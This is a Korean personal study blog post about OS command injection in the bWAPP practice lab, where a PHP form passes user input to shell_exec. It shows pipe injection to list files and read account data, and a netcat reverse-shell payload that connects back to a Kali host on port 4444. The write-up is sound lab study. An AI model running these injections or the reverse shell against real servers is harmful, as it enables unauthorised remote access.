글쓰기에 앞서 이 블로그는 개인이 공부한 것을 기록해 놓는 용으로 틀린부분이나 잘못된 표현이 있을 수 있습니다.
문제가 틀린 부분을 발견 하면 댓글 부탁드립니다.
OS Command Injection

Lookup을 클릭하면 입력 창에 적힌 주소의 ip정보가 출력되는것 같다.
서버에 들어가서 내용을 확인해 보면

위와같은 형식으로 작동한다
$_POST["target"] target 이라는 변수를 POST 메소드로 받고
isset(???) = 안에 들어가는 파라미터(변수)의 값이 null 값이면 false 값이 있으면 true로 반환한다
shell_exec(" ???") php 파일에서 터미널 명령어를 실행하는 명령어
ex) shell_exec(" nslookup") == nslookup 명령어 실행
nslookup (ip)
여기서 | (파이프) 를 사용해서 두 가지를 한번에 실행 시키면 어떻게 될까?
shell_exec(" nslookup | ls -al") 을 실행하는 것과 같이 될 것이다

ls -al이 출력되는 것을 볼 수 있다.
다른 명령어도 사용해보자.

계정 정보를 열어볼 수 있다.
추가 ++ 리버스 커넥션@
우선 칼리에서 포트를 nc 명령어로 열어주자

nc(netcat)는 네트워크 도구로, TCP 또는 UDP 연결을 생성하고 관리할 수 있고 주로 네트워크 진단, 원격 시스템에 명령어 전송, 포트 스캐닝, 채팅 등 다양한 용도로 사용되는 명령어라고 한다.
여기서 -l 은 listen 상태로 변환하는 명령어로 서버가 클라이언트의 요청(접속/접근)을 받을 준비가 완료되었다는 뜻이다.
-p는 포트고 임의의 4444포트를 연다는 뜻이다.
그후

http://www.nsa.gov|nc 192.168.111.128 4444 -e /bin/bash 을 입력해서
(-e /bin/bash (exec)원격 연결이 성공하면 /bin/bash 셸을 실행)
shell_exec("???")는 PHP 파일에서 터미널 명령어를 실행하는 함수이다.
칼리에서 열어둔 4444포트로 접속을 하면 칼리에서 bWAPP에 원격 접속을 한것 처럼 된다.

'모의해킹' 카테고리의 다른 글
| SQL Injection (0) | 2025.01.24 |
|---|---|
| PHP Code Injection (0) | 2025.01.23 |
| Server-Side Includes (SSI) Injection (0) | 2025.01.21 |
| iFrame injection (0) | 2025.01.20 |
| HTML Injection (1) | 2025.01.19 |